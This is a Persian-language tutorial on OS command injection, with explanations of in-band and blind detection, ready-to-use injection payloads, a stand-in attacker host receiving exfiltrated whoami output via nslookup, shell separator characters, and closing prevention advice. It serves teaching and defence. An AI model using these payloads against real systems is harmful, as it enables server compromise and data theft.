OS Command Injection چیست؟

os command injection

در این مقاله یکی از رایج‌ترین حملات تزریق فرمان را توضیح می‌دهیم. این حمله که به نام‌های تزریق فرمان سیستم‌عامل، تزریق دستور OS و تزریق Shell شناخته می‌شود، یکی از حملات وب به شمار می‌رود. در بخش‌های بعدی آسیب‌پذیری‌هایی را که می‌توان برای این حمله از آن‌ها سواستفاده کرد و نحوه‌ی شناسایی و اکسپلویت آن‌ها را تشریح می‌کنیم، چند مورد از دستورات و تکنیک‌های به‌دردبخور برای سیستم‌عامل‌های مختلف را مرور می‌کنیم، و به طور خلاصه نحوه‌ی جلوگیری از حملات تزریق فرمان OS را توضیح می‌دهیم.

os command injection

تزریق فرمان OS چیست؟

OS Command Injection که با نام تزریق شل یا Shell Injection نیز شناخته می‌شود، یک آسیب‌پذیری وب است که به مهاجم اجازه می‌دهد دستورات سیستم‌عامل (OS) دلخواه خود را روی سروری اجرا کند که یک وب اپلیکیشن روی آن قرار دارد. این حمله در صورت موفقیت، معمولا باعث هک‌شدن کامل اپلیکیشن و تمام داده‌های آن می‌شود. بسیاری اوقات، یک مهاجم می‌تواند با استفاده از یک آسیب‌پذیری تزریق فرمان OS، به بخش‌های دیگر زیرساخت میزبان نیز دسترسی پیدا کند؛ مهاجم برای این کار روابط و اتصالات مورد اعتماد در زیرساخت را اکسپلویت می‌کند تا بتواند حمله را به دیگر سیستم‌های داخل سازمان نیز گسترش دهد – کاری که اصطلاحاً به آن Pivot کردن حمله می‌گویند.

تزریق شل چیست؟

تزریق دستورات دلخواه

یک اپلیکیشن خرید را فرض کنید که به کاربر اجازه می‌دهد موجودی یک محصول خاص در یک فروشگاه خاص را چک کند. با لینکی مثل URL زیر می‌توان این اطلاعات را به دست آورد:

https://insecure-website.com/stockStatus?productID=381&storeID=29

اپلیکیشن برای تهیه‌ی اطلاعات موجود محصول، باید از چندین سیستم Legacy کوئری کند. این کارکرد در این اپلیکیشن از گذشته به این صورت پیاده شده که یک دستور شل اجرا می‌کند که آرگومان‌های آن، ID محصول و فروشگاه هستند:

stockreport.pl 381 29

خروجی این دستور، وضعیت موجودی محصول مورد نظر است که به کاربر برمی‌گردد.

از آن‌جایی که این اپلیکیشن هیچ راهکار دفاعی برای مقابله با حملات تزریق شل استفاده نکرده، یک مهاجم می‌تواند ورودی زیر را وارد کند و یک دستور متفرقه اجرا کند:

& echo aiwefwlguh &

این ورودی در قسمت productID در URL قرار می‌گیرد. بعد از آن، دستوری که سیستم عامل اجرا می‌کند، دستور زیر است:

stockreport.pl & echo aiwefwlguh & 29

دستور echo خیلی ساده باعث می‌شود رشته حروفی که به آن داده شده در خروجی نمایش داده شود، و برای تست وجود برخی از انواع آسیب‌پذیری‌های تزریق دستورات OS به کار می‌آید. کاراکتر & یک عملگر در زبان شل و به معنای شروع خط جدید دستور است، به همین خاطر عملا چیزی که اجرا می‌شود، سه دستور پشت سر یکدیگر است. در نتیجه، این خروجی به کاربر برمی‌گردد:

Error – productID was not provided
aiwefwlguh
29: command not found

این سه خط دستور به این معنی هستند:

  • دستور اصلی یعنی pl، بدون آرگومان‌های مورد انتظار اجرا شده، و به همین دلیل یک پیام خطا برگردانده است.
  • دستور echo تزریق‌شده اجرا شده است، و رشته‌حروف داده‌شده به آن در خروجی چاپ شده است.
  • آرگومان اصلی 29 به عنوان یک دستور اجرا می‌شود که یک خطا برمی‌گرداند.

عموماً بهتر است پس از هر دستور، یک عملگر دستور «&» قرار دهیم، چون دستور تزریق‌شده را از کاراکترهایی که پس از آن می‌آیند جدا می‌کند. با این کار احتمال این که کاراکترهای آمده در ادامه‌ی دستور باعث عدم اجرای آن شوند، بسیار کمتر می‌شود.

دستورات مفید

وقتی یک آسیب‌پذیری تزریق فرمان OS را شناسایی کردید، معمولا بهتر است که ابتدا چند دستور اولیه را اجرا کنید تا بتوانید اطلاعات بیشتری راجع به سیستم هدف به دست آورید. در جدول زیر خلاصه‌ای از برخی دستورات مفید لینوکسی و ویندوزی آمده است:

هدف دستورلینوکسویندوز
اسم کاربر فعلیwhoamiwhoami
سیستم عاملuname –aver
پیکربندی شبکهifconfigipconfig/all
اتصالات شبکهnetstat –annetstat -an
پروسس‌های در حال اجراps –eftasklist

آسیب‌پذیری‌های Blind OS Command Injection

بسیاری از نمونه‌های آسیب‌پذیری تزریق دستورات OS، از نوع Blind یا کور هستند. این آسیب‌پذیری زمانی اتفاق می‌افتد که اپلیکیشن خروجی دستور را در پاسخ HTTP خود برنمی‌گرداند. با این وجود می‌توان آسیب‌پذیری‌های کور را هم اکسپلویت کرد، ولی برای این کار به تکنیک‌های متفاوتی نیاز است.

یک وبسایت را فرض کنید که به کاربران اجازه می‌دهد بازخورد خود را در قسمت Feedback سایت ثبت کنند. کاربر برای ثبت بازخورد آدرس ایمیل و پیام مورد نظر خود را وارد می‌کند. سپس اپلیکیشن سمت سرور یک ایمیل برای ارسال به یکی از ادمین‌های سایت تولید می‌کند و پیام بازخورد را در آن قرار می‌دهد. اپلیکیشن برای این کار برنامه‌های mail را صدا می‌زند و اطلاعات را در آن ثبت می‌کند. برای مثال:

mail -s “This site is great” -aFrom:[email protected] [email protected]

خروجی دستور mail (در صورتی که اصلا خروجی داشته باشد) در پاسخ اپلیکیشن به کاربر برنمی‌گردد، و به همین خاطر استفاده از پی‌لود echo کارساز نیست. در این وضعیت، می‌توان از مجموعه‌ای متنوع از تکنیک‌های دیگر برای شناسایی و اکسپلویت یک آسیب‌پذیری استفاده کرد.

تشخیص آسیب‌پذیری Blind OS Command Injection با استفاده از تاخیرهای زمانی

شما می‌توانید دستوری را تزریق کنید که باعث ایجاد یک تاخیر زمانی شود؛ با استفاده از چنین دستوری می‌توانید بر اساس زمانی که طول می‌کشد تا اپلیکیشن پاسخ خود را ارسال کند، متوجه شوید که دستور اجرا شده یا نه. استفاده از دستور ping یک روش موثر برای انجام این کار است، چون این دستور به شما اجازه می‌دهد تعداد پکت‌های ICMP را که ارسال می‌شوند تعیین کنید، و از این طریق می‌توانید مدت زمان اجرای دستور را تغییر دهید:

& ping -c 10 127.0.0.1 &

این دستور باعث می‌شود اپلیکیشن از آداپتور Loopback خود به مدت 10 ثانیه پینگ بگیرد.

اکسپلویت Blind OS Command Injection با ریدایرکت‌کردن خروجی

شما می‌توانید خروجی فرمان تزریق‌شده را به یک فایل داخل web root ریدایرکت کنید که از طریق مرورگر به آن دسترسی دارید. برای مثال، اگر اپلیکیشن منابع استاتیک را از آدرس /var/ww/static در فایل‌سیستم سرور بارگیری می‌کند، می‌توانید ورودی زیر را در آن ثبت کنید:

& whoami > /var/www/static/whoami.txt &

کاراکتر « < » خروجی دستور whoami را به فایل تعیین‌شده می‌فرستد. پس از اجرای این دستور می‌توانید از طریق مرورگر خود فایل را از آدرس https://vulnerable-website.com/whoami.txt دریافت کنید و خروجی دستور تزریق‌شده (در این مورد whoami) را در آن مشاهده کنید.

اکسپلویت تزریق فرمان OS کور با تکنیک‌های OAST (Out-of-Band)

شما می‌توانید با استفاده از تکنیک‌های OAST یا Out-of-Band، دستوری را به سیستم‌عامل تزریق کنید که باعث برقراری یک ارتباط Out-of-Band با سیستمی شود که در کنترل شماست. برای مثال:

& nslookup kgji2ohoyw.web-attacker.com &

این پی‌لود از دستور dnslookup استفاده می‌کند تا یک DNS Lookup برای دامنه‌ی مشخص‌شده انجام شود. مهاجم می‌تواند انجام‌شدن این لوک‌آپ خاص را زیر نظر بگیرید، و این گونه متوجه شوید تزریق دستور با موفقیت انجام شده یا نه.

کانال out-of-band یک راه آسان نیز برای استخراج خروجی دستورات تزریق‌شده فراهم می‌کند:

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

این دستور باعث انجام یک DNS Lookup می‌شود؛ این DNS Lookup برای آدرسی انجام می‌شود که زیردامنه‌ی کاربر است و خروجی دستور whoami –یعنی نام کاربر- را نیز در خود دارد. برای مثال:

wwwuser.kgji2ohoyw.web-attacker.com

راه‌های مختلف تزریق دستورات OS

تعداد زیادی از متاکاراکترهای شل را می‌توان برای اجرای حملات تزریق فرمان OS استفاده کرد.

بعضی کاراکترها مثل جداکننده فرمان‌ها عمل می‌کنند، و به شما اجازه می‌دهند چند دستور را پشت سر هم قرار دهید. جداکننده‌های زیر هم روی سیستم‌های ویندوزی و هم سیستم‌های مبتنی بر یونیکس کار می‌کنند:

  • &
  • &&
  • |
  • ||

جداکننده‌های زیر فقط روی سیستم‌های مبتنی بر یونیکس کار می‌کنند:

  • ;
  • کاراکتر Newline (0x0a یا \n)

به علاوه، در سیستم‌های مبتنی بر لینوکس می‌توانید از کاراکتر backtick ( کاراکتر `) یا علامت دلار ($) هم استفاده کنید تا بتوانید دستور تزریق‌شده را در دل دستور اصلی (یا به عبارت بهتر به صورت inline) اجرا کنید:

  • ` injected command `
  • $( injected command )

توجه داشته باشید که کارکرد و رفتار متاکاراکترهای شل تفاوت‌های ظریفی با هم دارند که ممکن است در کارکردن یا کارنکردن حمله در بعضی شرایط خاص، تاثیری تعیین‌کننده داشته باشد. در انتخاب این کاراکترها باید به این نکته هم توجه داشته باشید که یک کاراکتر خاص فقط اجازه‌ی دستیابی in-band (داخل شبکه) به خروجی یک دستور را می‌دهد یا برای اکسپلویت Blind یا کور هم می‌توان از آن استفاده کرد.

بعضی اوقات، دستور اصلی که داخل آن کد تزریقی را وارد می‌کنید، داخل کوتیشن (“ یا ‘) قرار دارد. در چنین مواقعی باید با گذاشتن مجدد علامت کوتیشن (“ یا ‘ بسته به این که کوتیشن با کدام علامت باز شده باشد) کوتیشن را ببندید و بعد از متاکاراکتر مناسب برای تزریق دستور جدید استفاده کنید.

نحوه جلوگیری از حملات تزریق فرمان OS

در حال حاضر موثرترین راه برای پیشگیری از آسیب‌پذیری‌های OS Command Injection، این است که هیچ‌وقت در کد لایه اپلیکیشن به طور مستقیم دستورات OS را استفاده نکنیم. در تمام موارد  استفاده، راه‌های جایگزین ایمن‌تر هم وجود دارد و می‌توان با استفاده از Platform API مناسب، عملکرد مورد نیاز را پیاده‌سازی کرد.

اگر در شرایط خاصی هیچ راهی جز استفاده از دستورات OS حاوی ورودی کاربر نبود، باید یک روش قدرتمند برای اعتبارسنجی ورودی کاربر پیاده کرد. چند نمونه از روش‌های اعتبارسنجی عبارتند از:

  • اعتبارسنجی ورودی با بررسی یک لیست سفید از مقادیر مجاز.
  • اطمینان از این که ورودی حتما عدد باشد.
  • اطمینان از این که ورودی فقط دارای حروف و اعداد است و هیچ کاراکتر دیگر یا فضای خالی (اسپیس) ندارد.

هیچ‌وقت سعی نکنید با حذف یا غیرمجازکردن متاکاراکترهای شل ورودی را پاکسازی کنید؛ در عمل این روش بسیار مستعد خطاست و یک هکر باتجربه و ماهر به راحتی می‌تواند چنین روش‌هایی را دور بزند.

علاقمند به حوزه امنیت اطلاعات و آشنا به حوزه تست نفوذ
  • facebook
  • twitter
  • googleplus
  • linkedIn
  • flickr

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *